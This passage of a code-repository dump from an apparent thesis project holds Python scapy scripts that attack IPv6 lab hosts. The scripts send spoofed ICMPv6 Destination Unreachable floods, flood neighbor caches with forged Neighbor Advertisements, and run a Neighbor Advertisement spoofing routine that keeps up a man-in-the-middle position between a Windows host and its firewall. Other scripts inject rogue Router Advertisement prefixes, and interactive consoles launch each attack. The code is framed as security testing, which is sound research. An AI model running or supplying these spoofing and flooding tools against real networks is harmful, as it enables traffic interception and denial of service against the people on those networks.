"src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Destination Unreachable messages\n\"\"\"\nclass DestinationUnreach:\n \n def __init__(self):\n print 'Destination Unreachable'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def buildPacketDestUnreach(self, ipAdr, code):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6DestUnreach(code=code)/IPv6(dst=self.firewall,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n \n def execModuleDestUnreachCode0(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 0)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode1(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 1)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode2(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 2)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode3(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 3)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode4(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 4)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode5(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 5)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode6(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 6)\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n def execAllLinux(self, exitIface):\n self.execModuleDestUnreachCode0(exitIface, self.linux)\n self.execModuleDestUnreachCode1(exitIface, self.linux)\n self.execModuleDestUnreachCode2(exitIface, self.linux)\n self.execModuleDestUnreachCode3(exitIface, self.linux)\n self.execModuleDestUnreachCode4(exitIface, self.linux)\n self.execModuleDestUnreachCode5(exitIface, self.linux)\n self.execModuleDestUnreachCode6(exitIface, self.linux)\n\n def execAllWindows(self, exitIface):\n self.execModuleDestUnreachCode0(exitIface, self.win)\n self.execModuleDestUnreachCode1(exitIface, self.win)\n self.execModuleDestUnreachCode2(exitIface, self.win)\n 
self.execModuleDestUnreachCode3(exitIface, self.win)\n self.execModuleDestUnreachCode4(exitIface, self.win)\n self.execModuleDestUnreachCode5(exitIface, self.win)\n self.execModuleDestUnreachCode6(exitIface, self.win)\n\n def execDestUnreachBadCodeWin(self,exitIface):\n for code in range(7,256):\n packetContainer = self.buildPacketDestUnreach(self.win, code)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execDestUnreachBadCodeLinux(self,exitIface):\n for code in range(7,256):\n packetContainer = self.buildPacketDestUnreach(self.linux, code)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execDestUnreachLengthLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for length in range(0,256):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=0,length=length)/IPv6(dst=self.firewall,src=self.linux,hlim=64)\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachLengthWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for length in range(0,256):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=0,length=length)/IPv6(dst=self.firewall,src=self.win,hlim=128)\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachNoRouteToDestWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachNoRouteToDestLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachAdrUnreachWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=3)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachAdrUnreachLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=3)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachPortUnreachWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=4)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachPortUnreachLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=4)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachCommDstAdminProhibitedWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachCommDstAdminProhibitedLinux(self, exitIface):\n for x in range(0,500):\n packet = 
IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachBeyondScopeSrcAdrWin(self, exitIface):\n        for x in range(0,500):\n            packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=2)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachBeyondScopeSrcAdrLinux(self, exitIface):\n        for x in range(0,500):\n            packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=2)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachSrcFailedPolicyWin(self, exitIface):\n        for x in range(0,500):\n            packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=5)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachSrcFailedPolicyLinux(self, exitIface):\n        for x in range(0,500):\n            packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=5)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachRejectRouteWin(self, exitIface):\n        data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n        for x in range(0,500):\n            packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=6)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=1)/data\n            send(packet, iface=exitIface, verbose=False)\n\n    def execDestUnreachRejectRouteLinux(self, exitIface):\n        data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n        for x in range(0,500):\n            packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=6)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=1)/data\n            send(packet, iface=exitIface, verbose=False)\n\n    \n" }, { "alpha_fraction": 0.6124265789985657, "alphanum_fraction": 0.6215061545372009, "avg_line_length": 46.193275451660156, "blob_id": "26deece870d90cf058833a1b32368814661fb6ba", "content_id": "c7215a26eba328318309d90ad024dee3993beda4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5617, "license_type": "no_license", "max_line_length": 79, "num_lines": 119, "path": "/python/code/neighbDisc.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom RAAttacks import *\nfrom NAAttacks import *\nfrom NSAttacks import *\nfrom redirectAttacks import *\n\n\"\"\"\nThis is a general class to start Neighbor Discovery protocol tests.\nThe linuxInterface and windowsInterface variables must be changed accordingly.\n\"\"\"\nclass NeighborDiscoveryAttacks:\n\n    def __init__(self, iface):\n        self.ipAddress = ''\n        self.iface = iface\n        self.name = 'NeighborDiscovery'\n        self.linuxInterface = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n        self.windowsInterface = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.firewallAddress = \"2001:abcd:acad:2::1\"\n\n\n    def startSystem(self):\n        Commands.setNeighborDiscoveryAttacksHistory()\n        running = 1\n        while running:\n            readline.parse_and_bind(\"tab: complete\")\n            #we receive data from the keyboard \n            command = raw_input(self.name + ' >>')\n            #help command\n            if 
re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n #-----Router Advertisement section-----\n #execution of all RA with Prefix tests\n elif re.match('execRAPrefixRemote', command):\n ra = RAPrefixOption(self.linuxInterface, self.windowsInterface)\n ra.execModule(self.iface, self.ipAddress)\n #execution of RA with Prefix internal verification\n elif re.match('execRAPrefixInternal', command):\n ra = RAPrefixOption(self.linuxInterface, self.windowsInterface)\n ra.execModuleInternal(self.iface, self.ipAddress)\n #execution of all RA with MTU tests\n elif re.match('execRAMTURemote', command):\n ra = RAMTUOption(self.linuxInterface, self.windowsInterface)\n ra.execModule(self.iface, self.ipAddress)\n #execution of RA with MTU internal verification\n elif re.match('execRAMTUInternal', command):\n ra = RAMTUOption(self.linuxInterface, self.windowsInterface)\n ra.execModuleInternal(self.iface, self.ipAddress)\n\n #-----Neighbor Advertisement section-----\n \n #execution of Win Mitm with internal NAs\n elif re.match('execNAWinMitmInternal', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleInternalWinMitm(self.iface)\n #execution of Cache Flooding with internal NAs\n elif re.match('execNACacheFloodingInternal', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleInternalCacheFlooding(self.iface, self.ipAddress)\n #execution of Cache Flooding with remote NAs to linux internal\n elif re.match('execNACacheFloodingRemoteLinux', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModuleRemoteLinuxCacheFlooding(self.iface)\n #execution of NA remote test\n elif re.match('execNARemote', command):\n na = NA(self.linuxInterface, self.windowsInterface)\n na.execModule(self.iface, self.ipAddress)\n \n #-----Neighbor Solicitation section-----\n \n #execution of NS internal test\n elif re.match('execNSInternalFlooding', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalCacheFlooding(self.iface, self.ipAddress)\n elif re.match('execNSInternalSelfSolWin', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalWinSelfSol(self.iface)\n elif re.match('execNSInternalSelfSolLinux', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternalLinuxSelfSol(self.iface)\n elif re.match('execNSRemoteSelfSolLinux', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleRemoteLinuxSelfSol(self.iface)\n elif re.match('execNSInternal', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModuleInternal(self.iface, self.ipAddress)\n #execution of NS remote test\n elif re.match('execNSRemote', command):\n ns = NS(self.linuxInterface, self.windowsInterface)\n ns.execModule(self.iface, self.ipAddress)\n\n #----Redirect section-----\n\n #execution of Redirect internal test\n elif re.match('execRedirectInternal', command):\n redirect = Redirect(self.linuxInterface, self.windowsInterface)\n redirect.execModuleInternal(self.iface, self.ipAddress)\n #execution of Redirect remote test\n elif re.match('execRedirectRemote', command):\n redirect = Redirect(self.linuxInterface, self.windowsInterface)\n redirect.execModuleRemote(self.iface, self.ipAddress)\n \n def showHelp(self):\n for 
entry in Help.getNeighborDiscoveryAttacksHelp():\n            print entry\n\n" }, { "alpha_fraction": 0.6141965389251709, "alphanum_fraction": 0.6563182473182678, "avg_line_length": 49.86507797241211, "blob_id": "38fd6776ce60c8b0e1119e751c3769055c04807d", "content_id": "835603e8a3b6986acc4f54f94cd06928d3e51231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6410, "license_type": "no_license", "max_line_length": 127, "num_lines": 126, "path": "/python/code/NAAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\n\n\n\"\"\"\nthe class builds NA messages\n\"\"\"\nclass NA:\n    \n    def __init__(self):\n        self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n        self.linuxMac = \"08:00:27:84:bb:37\"\n        self.linuxSolicitedMulti = \"ff02::1:ff84:bb37\"\n        self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.winMac = \"08:00:27:82:a6:ec\"\n        self.winSolicitedMulti = \"ff02::1:ff47:fd83\"\n        self.linkWin = \"fe80::b485:2aec:9447:fd83\"\n        self.firewall = \"2001:abcd:acad:2::1\"\n        self.firewallMac = \"08:00:27:b1:da:41\"\n        self.linkFirewall = \"fe80::1\"\n        self.prefix = \"2001:abcd:acad:2:\"\n        self.adrList = Set()\n        print 'Neighbor Advertisement'\n\n    \n    def buildPacketInternalCacheFlooding(self, mac, srcGlobalUni, ipAdr):\n        targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n        return Ether(src=mac)/IPv6(dst=ipAdr,src=srcGlobalUni)/ICMPv6ND_NA(R=0,S=1,O=1,tgt=srcGlobalUni)/targetLinkLayer\n\n    def buildPacketInternalMitm(self, mac, src, dst, isRouter, solicited):\n        targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n        return Ether(src=mac)/IPv6(dst=dst,src=src)/ICMPv6ND_NA(R=isRouter,S=solicited,O=1,tgt=src)/targetLinkLayer\n\n    def buildPacketRemoteCacheFlooding(self, mac, dst, tgtGlobalUni):\n        targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n        return Ether(src=mac)/IPv6(dst=dst,src=tgtGlobalUni)/ICMPv6ND_NA(R=0,S=1,O=1,tgt=tgtGlobalUni)/targetLinkLayer\n\n\n    #interfaces for internal testing\n    def execModuleInternalCacheFloodingWin(self, exitIface):\n        start = 0x0001\n        end = 0xffff\n        for t in xrange(start, end):\n            hex24 = '{:04x}'.format(t)\n            mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            #the ping activates the process to be poisoned\n            data = \"abcdefghijklmnopqrstabcd\"\n            ping = IPv6(dst=self.win,src=globalUni)/ICMPv6EchoRequest()/data\n            send(ping, iface=exitIface, verbose=False)\n            #send the NA after the victim sends an NS reachability probe, so the entry is inserted in its neighbor cache and it then responds with an Echo Reply\n            packetContainer = self.buildPacketInternalCacheFlooding(mac, globalUni, self.win)\n            sendp(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalCacheFloodingLinux(self, exitIface):\n        start = 0x0001\n        end = 0xffff\n        for t in xrange(start, end):\n            hex24 = '{:04x}'.format(t)\n            mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            #the ping activates the process to be poisoned\n            data = \"abcdefghijklmnopqrstabcd\"\n            ping = IPv6(dst=self.linux,src=globalUni)/ICMPv6EchoRequest()/data\n            send(ping, iface=exitIface, verbose=False)\n            #send the NA after the victim sends an NS reachability probe, so the entry is inserted in its neighbor cache and it then responds with an Echo Reply\n            packetContainer = self.buildPacketInternalCacheFlooding(mac, globalUni, self.linux)\n            sendp(packetContainer, iface=exitIface, 
verbose=False)\n\n    #internally only against Windows\n    def execModuleInternalWinMitm(self, exitIface):\n        data = \"abcdefghijklmnopqrstabcd\"\n        #this is to induce windows to disclose its temp adr\n        pingWindows = IPv6(dst=self.win)/ICMPv6EchoReply()\n        send(pingWindows, iface=exitIface, verbose=False)\n        #ping windows device\n        pingWindows = IPv6(dst=self.linkWin,src=self.linkFirewall)/ICMPv6EchoRequest()/data\n        send(pingWindows, iface=exitIface, verbose=False)\n        #send NA using link local after Windows starts the reachability process\n        packetContainerWin = self.buildPacketInternalMitm(self.linuxMac, self.linkFirewall, self.linkWin, True, 1)\n        sendp(packetContainerWin, iface=exitIface, verbose=False)\n        #send NA using Firewall src global after Windows starts the reachability process\n        packetContainerWinFGlobal = self.buildPacketInternalMitm(self.linuxMac, self.firewall, self.linkWin, True, 1)\n        sendp(packetContainerWinFGlobal, iface=exitIface, verbose=False)\n        #send NA to Firewall using link local\n        packetContainerFirewall = self.buildPacketInternalMitm(self.linuxMac, self.linkWin, self.linkFirewall, False, 0)\n        sendp(packetContainerFirewall, iface=exitIface, verbose=False)\n        #the sniffer eventually grabs the win tmp adr\n        self.receiver(exitIface)\n        print self.adrList\n        #continue to send NA to both firewall and win to maintain Mitm\n        for p in range(1,500):\n            for adr in self.adrList:\n                packet = self.buildPacketInternalMitm(self.linuxMac, adr, self.linkFirewall, False, 1)\n                sendp(packet, iface=exitIface, verbose=False)\n            sendp(packetContainerFirewall, iface=exitIface, verbose=False)\n            sendp(packetContainerWin, iface=exitIface, verbose=False)\n            sendp(packetContainerWinFGlobal, iface=exitIface, verbose=False)\n\n    def execModuleRemoteLinuxCacheFlooding(self, exitIface):\n        start = 0x0001\n        end = 0xffff\n        for t in xrange(start, end):\n            hex24 = '{:04x}'.format(t)\n            mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n            #the ping activates the poisoning\n            data = \"abcdefghijklmnopqrstabcd\"\n            ping = IPv6(dst=self.linux,src=globalUni)/ICMPv6EchoRequest()/data\n            send(ping, iface=exitIface, verbose=False)\n            packetContainer = self.buildPacketRemoteCacheFlooding(mac, self.linux, globalUni)\n            sendp(packetContainer, iface=exitIface, verbose=False)\n\n    #the callback adds IPv6 addresses that carry the prefix and are not the internal Linux Debian\n    def packet_callback(self, packet):\n        if IPv6 in packet[0]:\n            adr = packet[IPv6].dst\n            print adr\n            if self.prefix in adr and not adr == self.linux:\n                self.adrList.add(adr) \n\n    #the sniffer for the internal Mitm NA attack\n    def receiver(self, iFace):\n        sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n\n" }, { "alpha_fraction": 0.580542266368866, "alphanum_fraction": 0.6331738233566284, "avg_line_length": 25.700000762939453, "blob_id": "4324771b89966d85c6d3eb75853db436ecc28db4", "content_id": "ab4f747cdb00b647b96ea2692d6639cd063497b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1542, "license_type": "no_license", "max_line_length": 85, "num_lines": 60, "path": "/thesis/files/monitorWinFirewall.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport threading\nimport time\nfrom scapy.all import *\n\ndef packet_callback(packet):\n    if ICMPv6ParamProblem in packet[0]:\n        adr = packet[IPv6].src\n        code = packet[ICMPv6ParamProblem].code\n        print code\n        print adr\n\ndef receiver(iface):\n    sniff(iface=iface, 
filter='ip6', prn=packet_callback, store=0, timeout=20)\n\nclass receiverThread(threading.Thread):\n\n    def __init__(self, iface):\n        threading.Thread.__init__(self)\n        self.iface = iface\n\n    def run(self):\n        print \"Starting Receiving Packets\"\n        rec = receiver(self.iface)\n\nclass echoSenderThread(threading.Thread):\n\n    def __init__(self, iface, target):\n        threading.Thread.__init__(self)\n        self.iface = iface\n        self.target = target\n\n    def run(self):\n        print \"Starting sending pongs\"\n        for x in range(1,100):\n            p = IPv6(dst=self.target)/ICMPv6EchoReply()\n            send(p, iface=self.iface, verbose=False)\n            time.sleep(2)\n\nwin = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\nlinux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\nallNodes = \"ff02::1\"\nrec = receiverThread(\"eth0\")\nsendEcho = echoSenderThread(\"eth0\", win)\n\nrec.start()\nsendEcho.start()\n" }, { "alpha_fraction": 0.6305761933326721, "alphanum_fraction": 0.6762295365333557, "avg_line_length": 49.0121955871582, "blob_id": "1eed33ac1354da26acc395a638d8f1060e348857", "content_id": "f4166f37e44e829a244d7c4a9675ed9623eed4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 976, "license_type": "no_license", "max_line_length": 188, "num_lines": 27, "path": "/python/code/RSAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class tests change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RS:\n    \n    def __init__(self):\n        self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n        self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.firewall = \"2001:abcd:acad:2::1\"\n        self.firewallMac = \"08:00:27:b1:da:41\"\n        self.linkFirewall = \"fe80::1\"\n        print 'Router Solicitation'\n\n    #test to verify the possibility of exploitation, to be done in internal network\n    def buildPacketInternalPrefix(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:1::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n    def execModuleInternalPrefixWin(self, exitIface):\n        packetContainer = self.buildPacketInternalPrefix(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.620103120803833, "alphanum_fraction": 0.6505154371261597, "avg_line_length": 29.3125, "blob_id": "f56ee495745188f783b94c21e853f6cb7cc15e11", "content_id": "acac0cd20a68228f920ad53dc87609091b7d02d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1940, "license_type": "no_license", "max_line_length": 97, "num_lines": 64, "path": "/python/code/echoReply.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\nimport threading\nimport time\n\n\n\"\"\"\nthe class builds Echo Reply messages\n\"\"\"\nclass EchoReply:\n    \n    def __init__(self):\n        self.adrList = Set()\n        print 'Echo Reply'\n        self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n    \n\n    def buildPacketEchoReply(self, ipAdr):\n        data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n        return IPv6(dst=ipAdr)/ICMPv6EchoReply(id=0,seq=0)/data\n    \n    #sending an unsolicited reply to windows 7 internal with firewall off causes the device to send back\n    #Parameter Problem (4) code 1 Unrecognized next header type\n    def execModuleEchoReplyWin(self, exitIface):\n        
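#note: the receiver thread is started first so its sniff window (filter 'ip6', timeout=10) is already open while the unsolicited Echo Replies below go out; packet_callback prints the code and source of any ICMPv6 Parameter Problem answer\n        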
receiver = ReceiverThread(exitIface)\n        receiver.start()\n        packetContainer = self.buildPacketEchoReply(self.win)\n        for x in range(1,10):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleEchoReplyLinux(self, exitIface):\n        receiver = ReceiverThread(exitIface)\n        receiver.start()\n        packetContainer = self.buildPacketEchoReply(self.linux)\n        for x in range(1,10):\n            send(packetContainer, iface=exitIface, verbose=False)\n    \n\n\n\"\"\"\nThreads necessary to start the receiver and at the same time send packets\n\"\"\" \nclass ReceiverThread(threading.Thread):\n    \n    def __init__(self, iface):\n        threading.Thread.__init__(self)\n        self.iface = iface\n\n    def run(self):\n        print \"Starting Receiving Packets\"\n        rec = self.receiver(self.iface)\n\n    def packet_callback(self, packet):\n        if ICMPv6ParamProblem in packet[0]:\n            adr = packet[IPv6].src\n            code = packet[ICMPv6ParamProblem].code\n            print code\n            print adr\n\n    def receiver(self, iFace):\n        sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n" }, { "alpha_fraction": 0.5994047522544861, "alphanum_fraction": 0.6297619342803955, "avg_line_length": 23.33333396911621, "blob_id": "25167a102ba1c443076d775acfec362a92e6b105", "content_id": "8621d640c358cb951277882684ec3d5d26e995ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "no_license", "max_line_length": 78, "num_lines": 72, "path": "/python/code/monitorWinFirewall.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport threading\nimport time\nfrom scapy.all import *\n\n\ndef packet_callback(packet):\n    if ICMPv6ParamProblem in packet[0]:\n        adr = packet[IPv6].src\n        code = packet[ICMPv6ParamProblem].code\n        print code\n        print adr\n\n\ndef receiver(iface):\n    sniff(iface=iface, filter='ip6', prn=packet_callback, store=0, timeout=20)\n\n\nclass receiverThread(threading.Thread):\n    \n    def __init__(self, iface):\n        threading.Thread.__init__(self)\n        self.iface = iface\n\n    def run(self):\n        print \"Starting Receiving Packets\"\n        rec = receiver(self.iface)\n\n\nclass echoSenderThread(threading.Thread):\n\n    def __init__(self, iface, target):\n        threading.Thread.__init__(self)\n        self.iface = iface\n        self.target = target\n\n    def run(self):\n        print \"Starting sending pongs\"\n        for x in range(1,100):\n            #reply = EchoReply(self.target)\n            #reply.execModuleEchoReply(self.iface)\n            p = IPv6(dst=self.target,nh=201)\n            send(p, iface=self.iface, verbose=False)\n            time.sleep(2)\n\n\n\"\"\"\nthe class builds Echo Reply messages\n\"\"\"\nclass EchoReply:\n    \n    def __init__(self, ipAdr):\n        self.ipAdr = ipAdr\n\n    def buildPacketEchoReply(self):\n        return IPv6(dst=self.ipAdr)/ICMPv6EchoReply()\n\n    def execModuleEchoReply(self, exitIface):\n        packetContainer = self.buildPacketEchoReply()\n        send(packetContainer, iface=exitIface, verbose=False)\n\n    \n\n\nwin = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\nlinux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\nrec = receiverThread(\"eth0\")\nsendEcho = echoSenderThread(\"eth0\", win)\n\nrec.start()\nsendEcho.start()\n" }, { "alpha_fraction": 0.569487988948822, "alphanum_fraction": 0.5708812475204468, "avg_line_length": 30.20652198791504, "blob_id": "282992bb7640568d9ac54c7e877b4d0c71fc01dc", "content_id": "23016a8d777c3cfae91a9bb1eb9cfff73b221976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2871, "license_type": "no_license", "max_line_length": 66, "num_lines": 92, "path": "/python/code/testingFramework.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom covertChannels import *\nfrom allCovertTest import *\nfrom allAttackingTest import *\nfrom neighbDisc import *\nfrom infoAndErrorAttacks import *\n\n\"\"\"\nclass responsible for Covert Channel module\n\"\"\"\nclass CovertChannel:\n\n    def __init__(self, iface):\n        self.name = 'Covert'\n        self.iface = iface\n    \n    #starts the interactive prompt\n    def startSystem(self):\n        Commands.setCovertChannelHistory()\n        running = 1\n        while running:\n            readline.parse_and_bind(\"tab: complete\")\n            #we receive data from the keyboard \n            command = raw_input(self.name + ' >>')\n            #help command\n            if re.match('help', command):\n                self.showHelp()\n            #quit module command\n            elif re.match('quit', command):\n                running = 0\n                Commands.setTestingFrameworkHistory()\n            #set echo request covert channel\n            elif re.match(r'setEchoRequest', command):\n                covert = EchoRequest()\n                covert.startSystem()\n            #set all covert channel tests\n            elif re.match(r'setAll', command):\n                covert = AllCovertTests(self.iface)\n                covert.startSystem()\n            else:\n                print 'Error! 
